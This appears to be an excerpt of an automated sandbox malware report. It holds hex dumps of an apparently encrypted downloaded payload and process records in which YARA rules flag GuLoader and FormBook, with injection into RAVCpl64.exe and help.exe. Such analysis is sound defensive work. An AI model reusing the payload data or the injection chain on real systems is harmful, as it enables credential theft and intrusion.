                                                                                                                                                                          Data Ascii: #.4>S+TwrfL3O2;,]BUt)Q/>8)4K^Zta?8=JtTj2 -8@160fJ|=&Ue4+^-f*jhwA{zeJzsf%Ra1T6rNFLi0/ae"I8D&KAx!
                                                                                                                                                                          2022-12-05 14:13:35 UTC175INData Raw: 9c 6a d1 93 cb a6 46 7f b9 e5 39 d1 07 4f d0 39 3b cb 84 bf 73 29 19 eb f7 a8 d6 20 1e 08 e6 21 4b 53 c2 35 4f c7 91 79 ec 4a 28 4d a2 34 41 3c e8 45 71 e5 5e 7e 47 2d 6c 0d d9 7c 27 af 81 06 17 24 10 58 67 46 d5 f4 97 1f a5 6d fd a8 97 4b 0a 6d e3 7b e5 d4 0c 08 5d 9e 53 63 28 1d b3 27 db 3f a5 67 ac e6 e6 ab dc 72 a2 43 56 93 86 9a b0 46 8f 0e 27 7f b7 05 9a 9a 68 fc 98 26 19 cc 49 15 65 c0 37 95 e1 81 66 b5 d3 68 eb f2 46 c1 e2 58 10 20 78 93 f5 f2 0f 61 d9 8b 46 3a de 77 5e af c3 a4 4e e6 2a 36 09 aa a6 36 2b 2a 5e 82 ba 46 d8 72 7d 11 b9 1d f2 c1 47 c3 44 bd 23 c8 0f 20 6f 75 76 31 25 71 c6 4c db 41 22 d8 c8 03 cc 95 ba 31 95 55 61 17 4b 3d 46 05 20 65 8c fe 89 a7 e2 33 46 1c 6d 34 6d 26 68 72 0d 7e 59 a7 a6 76 77 95 bd 20 7b 16 1e 96 28 0d 44 b9 2d
                                                                                                                                                                          Data Ascii: jF9O9;s) !KS5OyJ(M4A<Eq^~G-l|'$XgFmKm{]Sc('?grCVF'h&Ie7fhFX xaF:w^N*66+*^Fr}GD# ouv1%qLA"1UaK=F e3Fm4m&hr~Yvw {(D-
                                                                                                                                                                          2022-12-05 14:13:35 UTC176INData Raw: 63 ad 0c ea b0 7c f5 d0 0e 32 70 e4 9f 39 9f 7c 2d 7f d2 39 0d 64 f4 6e 95 28 72 1a cc 2e 1d 47 1a c1 63 41 ab 3e 9a 1b 1d ef 05 62 cd 20 55 66 53 e1 5b 34 3a 39 22 44 3c f8 c3 8d d5 52 cf 8d 22 fb 33 b9 64 8a 93 ff 01 a5 2c aa fc 49 11 c4 16 d5 a3 90 fa a4 aa 12 bf dc 58 94 4a 9e 7e 7a 21 36 04 6c c5 55 38 72 70 8c f6 08 d5 a9 98 40 ad d8 0c b6 92 32 d9 2f 28 de d1 a0 c2 09 39 05 8a 91 a7 97 33 30 a8 d6 1d 3d 9b 88 a9 c6 e6 f0 fc ae e7 26 7f c2 89 7f 0a 7d 83 21 41 2c df be fb 81 0a 38 0f 3b 1f 94 89 38 a9 a8 b3 69 c2 3f 8c 75 f1 7f b9 cf 94 0e ff 1e 13 2c fc e6 06 a7 b1 d7 16 42 94 68 d0 a1 3e f6 81 61 32 56 c1 e1 0e 69 97 d5 56 36 a9 26 a7 50 a8 b0 b5 a7 8e 10 d7 00 0a b6 71 a4 5e c9 8b d6 12 8b 7d 64 59 ca fd 3b 67 50 35 8b f9 c3 7b 62 fa 72 4a bd d6
                                                                                                                                                                          Data Ascii: c|2p9|-9dn(r.GcA>b UfS[4:9"D<R"3d,IXJ~z!6lU8rp@2/(930=&}!A,8;8i?u,Bh>a2ViV6&Pq^}dY;gP5{brJ
                                                                                                                                                                          2022-12-05 14:13:35 UTC178INData Raw: e9 72 8c ac 9c 89 18 96 7a 0f fd 82 17 02 1b 64 87 94 69 34 e7 dd aa 44 e2 7d 79 4b 0c b3 7f c5 f4 1c c9 77 20 45 7f 12 f2 66 4f 66 b5 3a 1d 31 8e 91 3f 7e 7a 2e a0 f9 dd d4 7d 65 89 78 f4 0e ee 7a b2 a6 4d 98 85 fb 86 30 11 55 dd de f2 5a 52 b0 5c c1 d6 4a 27 25 6d 25 82 bb 1c f0 0d dd 79 1e 94 4d 03 ff e9 c8 3b 66 17 21
                                                                                                                                                                          Data Ascii: rzdi4D}yKw EfOf:1?~z.}exzM0UZR\J'%m%yM;f!
                                                                                                                                                                          2022-12-05 14:13:35 UTC178INData Raw: aa 69 c3 1a 94 2a 8a 31 aa a0 12 f6 0c 3e e9 ba 97 51 57 d5 a8 46 bc 98 ab 5d ef 9e a4 15 46 07 e6 c0 1b 24 fd a6 85 0d 2d a4 22 36 12 d8 84 80 36 72 7d 1c f6 2b 0d 66 a2 ef 60 10 c8 c5 16 f6 b3 2a e0 69 31 2e 66 13 4b a9 4f 8a 1c fa 4f c3 41 f8 9d 07 88 e9 57 bd cc 8e f0 b2 f6 fb 03 71 98 f7 e0 68 c9 19 e8 20 33 79 1e 41 5a 79 5d bb 42 ea 08 6a 9e fe b8 81 06 84 52 22 7c 4f 82 e3 97 c8 14 87 0b d2 67 ae 18 9a 11 19 02 c5 64 e1 30 dd 7c ba 6d 42 a9 d5 c0 c7 85 f7 bf 00 1c 40 f6 fa 6e c2 d0 67 fd 38 a3 bb 94 e1 cc a8 cb 67 3e a6 ab ee 71 c1 73 80 d9 15 8f b7 06 6b 44 75 c2 f0 06 70 24 05 9d 8a 18 0c 23 59 08 7a d0 8c f6 e9 18 25 6e 55 d8 24 8f 3b 9d b5 63 b4 ac 2f 27 0b 1d 62 0d b0 33 11 80 16 d6 97 ae 47 b9 b6 89 38 68 dc a7 d4 8a 4f 08 92 75 5f 07 c9 29
                                                                                                                                                                          Data Ascii: i*1>QWF]F$-"66r}+f`*i1.fKOOAWqh 3yAZy]BjR"|Ogd0|mB@ng8g>qskDup$#Yz%nU$;c/'b3G8hOu_)
                                                                                                                                                                          2022-12-05 14:13:35 UTC179INData Raw: cc b1 17 bb c4 f9 60 67 61 d8 30 0a bb 51 34 b2 59 63 f9 b6 89 51 6a 7e 33 53 e5 17 fc b1 fe 56 4b d0 0f 81 e5 cd 78 02 f4 51 2f 10 41 5e 47 cd ef 42 f8 47 f6 88 6f b2 c9 20 f1 fe 25 f4 49 e9 85 56 a7 9b 30 af 43 4b 84 4a b7 18 9a 65 8c 16 b8 f9 ee 16 b9 bf f9 17 f4 63 f4 eb 50 49 78 c2 67 95 5c 31 56 e8 f0 03 ff 2e bd 94 ec 31 85 e6 4c f2 6d bd cb eb b9 b5 27 49 ec 40 93 cc cc b9 b9 03 16 83 e2 34 28 5d fa a8 6f 7b 49 94 c9 38 ec 2a d4 68 96 0c 83 11 0a 2a 08 db b5 94 35 a7 b8 bc cd f5 fe bd 1f 00 a7 af 60 a9 2d 07 c0 70 82 82 db 5c 8a ca 2e 6f 8a ee ea b4 54 7e 50 5e 92 6e 0a 3e 2f aa da fb e7 d2 4f 2d 84 36 fc 64 1f 54 60 07 82 e1 fa d8 fa ad 85 17 f7 2b e5 a8 1f 0b cd c6 fa 4e 8b 4b 19 9a b2 eb 38 b6 42 ae 0c 6b 5a 23 f9 86 78 15 bf b9 7f f4 9d 30 85
                                                                                                                                                                          Data Ascii: `ga0Q4YcQj~3SVKxQ/A^GBGo %IV0CKJecPIxg\1V.1Lm'I@4(]o{I8*h*5`-p\.oT~P^n>/O-6dT`+NK8BkZ#x0
                                                                                                                                                                          2022-12-05 14:13:35 UTC180INData Raw: 0b a0 30 bf bc 7a d0 32 1d 39 99 5f 19 74 6e df 6f b2 18 07 1f a3 6c fa cc 16 b0 8a db 85 aa 08 84 01 af 58 26 24 dc e9 d0 10 b9 4f 04 b7 76 bb 49 0c a4 2f 74 f1 59 47 61 64 04 6f 8d fe 22 bd b4 c7 8d 49 d6 e6 59 09 44 2d 46 e8 f1 9b 0b 18 9c 34 ae 67 cb f4 44 b0 cc 7d 85 cb 1a db 25 82 68 89 96 2d e9 ff d2 33 aa cd 9d fa 3f e4 7f 2d 61 24 8d bd 0c f2 2f f5 77 67 74 50 0e 3d 06 c1 cc 8d c6 be 4a 9c b7 1a b4 05 3c 88 88 4b 87 22 d3 9d 33 35 1e ba 77 08 72 08 c8 24 ee 3a b0 7a 2c 14 35 32 72 57 08 0b 82 7a 31 bb cc e1 c9 6f 46 4a 0d 2b ba 5c cc 39 24 b2 e8 c7 78 d0 9b 99 3a 83 31 92 15 f4 f6 4c c2 5c e5 17 04 1d 76 0e 3b ff 74 6a 99 1b 3b b4 5f c0 7f cf da 2e 46 b3 a6 20 90 73 03 7f 45 77 57 72 62 39 27 3b 45 ec 9e c9 c0 fa 7c 4c e8 d3 ea 47 e0 86 49 46 2d
                                                                                                                                                                          Data Ascii: 0z29_tnolX&$OvI/tYGado"IYD-F4gD}%h-3?-a$/wgtP=J<K"35wr$:z,52rWz1oFJ+\9$x:1L\v;tj;_.F sEwWrb9';E|LGIF-
                                                                                                                                                                          2022-12-05 14:13:35 UTC181INData Raw: 79 94 22 c2 ed 35 d7 d7 af a7 f2 ef b2 1c 51 02 19 77 11 77 e4 12 bc 73 72 af b0 f9 37 e5 ba 40 cc b3 0b 37 7f 69 52 68 ad 1e 90 b2 c6 a6 21 c4 1c c3 54 7e e2 aa 4f fe 3f 9f de dd 6b 5d 24 d2 4d 8c b2 08 ac b7 cf 5c eb 51 ff db 08 06 d9 06 4f e2 57 11 a0 aa 1a c4 d3 b5 11 a7 4c ce f1 dc 2c ac 88 e3 5f 5b 17 5a da 20 4a 67 8f 12 2b 54 16 64 6f b6 bf 4f 8c 5a b9 be 4a 23 60 42 7d 77 31 7e ae f3 d5 17 1a b1 43 c8 ab 14 1a 1b a9 18 61 b1 1b b0 09 6d db bf eb 62 92 3b 8f 11 db 19 66 6c eb b6 d2 6a 5c b7 3a af 2c d2 a4 3b 49 1e 40 df 9b b1 c2 30 93 63 5a e7 75 57 77 da 01 b8 48 f3 4a c9 6d 79 ee 6b 5e b1 00 d8 98 b4 37 d3 de db 35 47 62 41 70 98 ce 24 1b b0 f0 74 4d 98 83 f2 9f 2e 81 84 57 08 17 f6 a4 8a c2 dd 94 e1 6b 90 d1 d8 42 34 5e 4f 54 e0 1e 38 42 c3 92
                                                                                                                                                                          Data Ascii: y"5Qwwsr7@7iRh!T~O?k]$M\QOWL,_[Z Jg+TdoOZJ#`B}w1~Camb;flj\:,;I@0cZuWwHJmyk^75GbAp$tM.WkB4^OT8B
                                                                                                                                                                          2022-12-05 14:13:35 UTC183INData Raw: c6 77 d6 33 1c 09 ee 0a fc 6d 83 73 4f 94 86 d8 c5 22 e7 01 01 97 94 bc eb 59 af bc 92 88 5c b7 b1 45 84 50 f7 d7 00 2a ba be 9e a9 20 59 d8 1e 19 32 08 be eb 74 e5 ff b9 a2 fd 9a c3 3b 63 4c e3 63 cf c5 95 ad fc 67 fb d5 2e 2c d5 39 af 74 dd 7d fd 7e 35 0f 87 6c 28 91 7a 4d c2 fc 45 65 f1 e6 da a1 b3 fc 66 9e 44 5e a0 4d 00 47 82 f6 ff 87 95 4a 65 6d b1 cb 4e 95 0f cb 3a a6 b1 37 53 ac f0 8a 39 e3 08 57 c7 a7 4f 7c 01 af 16 ad a0 51 de 22 e2 bb e3 50 ab 22 c5 73 37 36 1b 00 14 d9 87 4b 00 61 c6 3c 5b af 94 f8 8d f1 6d 35 d5 24 15 4a c4 73 12 9c 8e 58 80 95 fc 9b 8f ec ce a7 0f 4a 90 5a 72 bb 49 49 06 a7 03 b2 f3 3f eb f4 d4 82 74 fe 58 e3 f0 aa 4c 92 dd 17 9e 91 77 03 c1 2e d0 23 d8 87 28 45 4d 7f 4b 13 f4 74 c5 1a a6 f8 e3 81 e1 56 96 c3 d7 0c b6 14 f3
                                                                                                                                                                          Data Ascii: w3msO"Y\EP* Y2t;cLcg.,9t}~5l(zMEefD^MGJemN:7S9WO|Q"P"s76Ka<[m5$JsXJZrII?tXLw.#(EMKtV
                                                                                                                                                                          2022-12-05 14:13:35 UTC184INData Raw: f1 9d 57 c2 c0 52 9b a0 a6 db 7d eb c3 ef bb e2 67 45 40 35 ba 5d df 70 be 69 31 6d 95 2e 37 b3 f2 fe e2 2c 22 73 8a 71 5d bf 0e 79 af f7 4a 2f c1 07 bb 9c eb 84 53 91 59 3e d1 4d 08 a6 8e 0e b2 d2 97 78 37 ce 69 79 ed a8 4f 41 e1 3d 6c f3 5f 4f 96 a0 dd 0c cd 8c 56 0a d5 7b 3d 99 f1 75 cc 73 a2 8c b7 4a b1 14 a4 82 9d bf 1a 47 c0 82 92 65 34 8b 18 22 b5 a6 29 dd 2a a9 b4 fe 46 79 f1 3f 04 14 ae 28 6b de 92 83 7d 5b 51 f9 92 5d 5b 64 ea 7a 05 8a ed ba d8 65 cc 52 57 27 81 09 09 92 30 b2 e4 ed 97 86 65 69 c3 e6 9f c3 c0 d4 3a e4 69 8a e4 f4 a6 e6 ae 1e 6d 66 8f b8 b8 d2 e1 6d 48 09 61 16 2b 62 32 6a b2 bc 55 61 5f f5 4b a3 31 68 21 66 5f b3 3b 05 d8 a7 ae a7 8e 12 aa 14 3f c1 69 9a e4 f2 82 00 fe c3 0f bc 6a b9 b0 b7 b5 28 48 8c 99 d4 20 98 13 80 fa 35 99
                                                                                                                                                                          Data Ascii: WR}gE@5]pi1m.7,"sq]yJ/SY>Mx7iyOA=l_OV{=usJGe4")*Fy?(k}[Q][dzeRW'0ei:imfmHa+b2jUa_K1h!f_;?ij(H 5
                                                                                                                                                                          2022-12-05 14:13:35 UTC185INData Raw: e3 d9 ab ea 09 04 6e a3 7b 71 a1 35 4a 8a ca a1 40 7a f8 2f 6f ee 86 b0 e1 75 d9 99 3d 51 00 88 b1 65 87 7c c4 f1 f4 6e ac a8 76 99 f0 3d ea 9f e9 87 15 b6 1f b3 7b 5c b3 5f 57 7d 97 56 e2 be c2 40 91 72 7b 25 08 32 e8 d9 92 09 42 71 80 69 2d f8 0a 56 26 7b 75 91 01 0d d6 82 90 87 55 47 11 e1 d8 09 8b 95 b4 08 1b 47 f4 08 d4 f0 06 1e e2 2b 57 0e da 27 6d d4 ed d6 27 26 db f5 2d f3 6e 6f 4f 14 cd 57 5c 9a 56 04 bd 89 ba 61 f0 75 69 7e 3c 7e f3 a7 ec 71 25 99 27 39 e9 4f 95 b9 1b 1d c4 6a 58 f6 f9 14 63 52 c3 83 e1 00 7e bf 2a d8 2b 52 8f 8b fb c5 4e c0 c1 78 a4 7b 0c 7c c0 1b f7 a4 4a 6d 1f 4d b8 13 d0 ce df 13 6a 7c c6 1e b8 e4 c9 66 47 50 89 4e 10 09 a1 93 2d 30 89 46 d2 de 8b 4e d4 4a e5 88 27 57 8b a2 80 cc 3e 2f 24 f0 02 f6 3f 9c 32 81 57 20 0d b3 f5
                                                                                                                                                                          Data Ascii: n{q5J@z/ou=Qe|nv={\_W}V@r{%2Bqi-V&{uUGG+W'm'&-noOW\Vaui~<~q%'9OjXcR~*+RNx{|JmMj|fGPN-0FNJ'W>/$?2W
                                                                                                                                                                          2022-12-05 14:13:35 UTC186INData Raw: ed 0e fb 91 30 63 81 16 b7 51 68 c7 76 34 15 ec 5a 16 80 57 de c5 d4 a3 a8 57 19 16 bd c5 e0 de 09 d8 01 d7 31 2c 4d ee 10 45 2b 44 08 b4 5c e3 f1 43 01 26 5d d0 33 dd d3 48 8c d0 11 79 8c 71 32 7a f9 ea 19 c7 08 3e c4 c2 0e 10 93 d0 b3 34 11 a6 7e 8d 6c 35 5f db a1 73 31 d1 94 73 b2 9a 14 d2 00 a4 97 1b 97 34 48 20 7c 42 af 27 94 a6 09 bc a1 78 e8 9a fb e3 0e 26 f4 42 34 c3 3e a2 12 15 33 72 18 ff 05 e0 d2 9a 5c 3e 2c 6e 52 52 8c 4a d2 dc 6b 81 b8 dc 08 ea 74 ff 36 1e b3 4b 47 c2 2d b2 2e eb c0 77 bb 7a 84 4e 62 9f de 3e 13 7d da 80 31 01 52 4c 6f 96 ff a8 1b ea 00 7a 69 8c e3 b6 0c 8c 4b 84 a2 4b fd 94 79 d9 94 e7 e5 2e fc 8f 27 0f 34 a6 d6 f4 b6 76 dc a7 ee 21 0d fa 5a bb d1 20 3f 62 a3 aa b1 ec 6c 22 ea 0d fc 8b f3 71 71 1f 1c d2 0c 7e 79 f4 d3 0e 64
                                                                                                                                                                          Data Ascii: 0cQhv4ZWW1,ME+D\C&]3Hyq2z>4~l5_s1s4H |B'x&B4>3r\>,nRRJkt6KG-.wzNb>}1RLoziKKy.'4v!Z ?bl"qq~yd
                                                                                                                                                                          2022-12-05 14:13:35 UTC187INData Raw: 53 1e d4 0e 88 3b c6 c2 de af 9a ec 2b 2b 9c 71 c1 58 b5 03 4f 9f b6 95 29 c5 71 ce ab 55 d5 86 fa b1 bb cb 8a 5d a5 b2 0f 4b cd 92 18 d3 fd aa 60 e6 47 86 af ba bc ad c5 1e 82 d2 45 e0 fd a1 cc 1c 1b ca 7b b3 10 d9 70 b8 bb f6 95 a3 37 8c 1a 98 08 31 83 94 a1 e9 1f 27 b0 5e 04 c0 89 b8 12 be 75 6b a7 53 47 57 26 38 a6 84 cd 9e 81 6f cf 5e 60 f6 58 ca 8c bb 89 98 e1 59 45 c8 37 9d 51 4b 36 aa c3 86 ae ae 84 bc 89 84 d1 35 89 34 29 1b 05 0f f2 93 32 57 9d bf 77 9d 62 4f 19 df eb c1 ce 3d 52 3a f1 4d 0d d3 f8 e2 3e 29 31 6f db 5b d1 89 6e 96 6b a4 8c 21 70 1b 7f a3 40 85 d8 bd f1 6c 40 af ca 57 28 a6 87 07 9e 53 eb d3 ba 3f 82 c7 d0 8a bd 05 6c f9 1f 73 00 66 f2 ea c1 1d ee 2d d8 e6 cd 26 61 70 8a 9b 73 fe 31 0f ab 88 28 ca 09 24 38 bb b6 a8 ca 89 83 ea 05
                                                                                                                                                                          Data Ascii: S;++qXO)qU]K`GE{p71'^ukSGW&8o^`XYE7QK654)2WwbO=R:M>)1o[nk!p@l@W(S?lsf-&aps1($8
                                                                                                                                                                          2022-12-05 14:13:35 UTC189INData Raw: ac d7 6b 56 8e 71 59 fd 23 38 db b1 dc 9b d2 b4 ed 41 51 a9 51 11 9d a3 02 27 04 cd ef da f1 ba 95 f6 0e db fc cb 3e 98 95 e8 d0 99 33 67 7e f7 59 18 d1 68 c6 f2 a2 54 8b 79 fd ce a0 a9 f6 9b 22 db 9d fb 43 f9 f8 ec 54 fb 5e f5 49 a3 f6 38 5c b4 d8 c4 09 08 81 90 e5 46 c1 a4 a8 6c f2 94 d4 dd 34 2e 4f e3 bc b8 ee 25 eb 30 43 ec 75 bf 13 e9 b6 96 22 14 34 79 9a a4 7e 77 7a 5b 52 63 2d f6 b0 a6 6f 52 45 69 bc d2 8a 37 c4 8e 57 44 0f 2f ee de 2a 7a c4 4f ca fc 29 f3 f9 a2 8c 20 75 36 49 e7 cc db ea 61 57 34 78 7f 1c 9f 25 b7 99 93 34 6c c0 2f 34 9b ad ce fe 16 63 e4 ac ce 65 29 02 63 a7 3b e1 0b 50 6d ce 56 2d 69 2e 35 67 e0 f3 89 19 1a db de 78 dc 1a ef 4f 94 d1 c9 d7 3c 10 43 61 33 37 fe 5e 3d 72 db 22 d8 c8 a9 9f 42 74 79 3e 67 0c 91 54 df 9d 0e e3 36 ac
                                                                                                                                                                          Data Ascii: kVqY#8AQQ'>3g~YhTy"CT^I8\Fl4.O%0Cu"4y~wz[Rc-oREi7WD/*zO) u6IaW4x%4l/4ce)c;PmV-i.5gxO<Ca37^=r"Bty>gT6
                                                                                                                                                                          2022-12-05 14:13:35 UTC190INData Raw: d2 59 78 5f b6 a1 c8 e5 37 66 7d 10 03 14 fe be 0f 68 9a a2 9d d4 48 2e e9 8c 86 36 52 61 62 97 02 6e 94 03 61 65 22 91 2b f7 a8 6d 1a 94 3f 95 53 ae 3f d5 4e 89 c7 19 62 40 be bb 46 bd dc 78 50 22 8e 01 b2 e4 95 0c 33 c0 80 e9 91 be 0a c2 2e eb a3 f9 73 da 91 e2 12 d2 85 f9 89 cc 97 8a 57 ea a3 3c 59 67 50 3c af 71 21 9c 03 b9 85 b3 49 5f 6e 30 02 d7 91 eb 73 c5 a8 18 b0 23 f9 3c 51 6e a3 a1 e6 38 7e 58 ac 7b 18 47 49 47 6d ee 2a bd 3c f2 84 ac a0 7d 06 de cf e8 ac 8b c5 20 a7 8b c9 92 1e 21 fc 04 56 dc b5 4b 37 83 8e 02 f0 ec 41 db 5c 71 d3 ce 63 fd 49 dd 1c 03 28 e1 65 e2 b8 51 8a 78 41 e6 e9 9f 74 28 c1 be d9 4c a0 ab db b3 c1 63 3d ee 4f 99 82 dc d6 a2 b8 87 73 61 25 98 d8 22 a2 6d 81 0a 78 b5 83 79 c7 a3 b9 54 61 54 58 7e a3 be 72 d9 ea d1 b5 61 6e
                                                                                                                                                                          Data Ascii: Yx_7f}hH.6Rabnae"+m?S?Nb@FxP"3.sW<YgP<q!I_n0s#<Qn8~X{GIGm*<} !VK7A\qcI(eQxAt(Lc=Osa%"mxyTaTX~ran


                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:15:12:51
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:298144 bytes
                                                                                                                                                                          MD5 hash:F4CAD3F0195D098CED41C4926A5695C2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000002.00000002.1200754284.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1201978346.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low

                                                                                                                                                                          Target ID:11
                                                                                                                                                                          Start time:15:13:14
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\Desktop\Jjfmcz1Hsz.exe
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:298144 bytes
                                                                                                                                                                          MD5 hash:F4CAD3F0195D098CED41C4926A5695C2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.978219667.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:15:13:43
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                          File size:16696840 bytes
                                                                                                                                                                          MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                          Target ID:19
                                                                                                                                                                          Start time:15:13:46
                                                                                                                                                                          Start date:05/12/2022
                                                                                                                                                                          Path:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                          Imagebase:0xe0000
                                                                                                                                                                          File size:10240 bytes
                                                                                                                                                                          MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
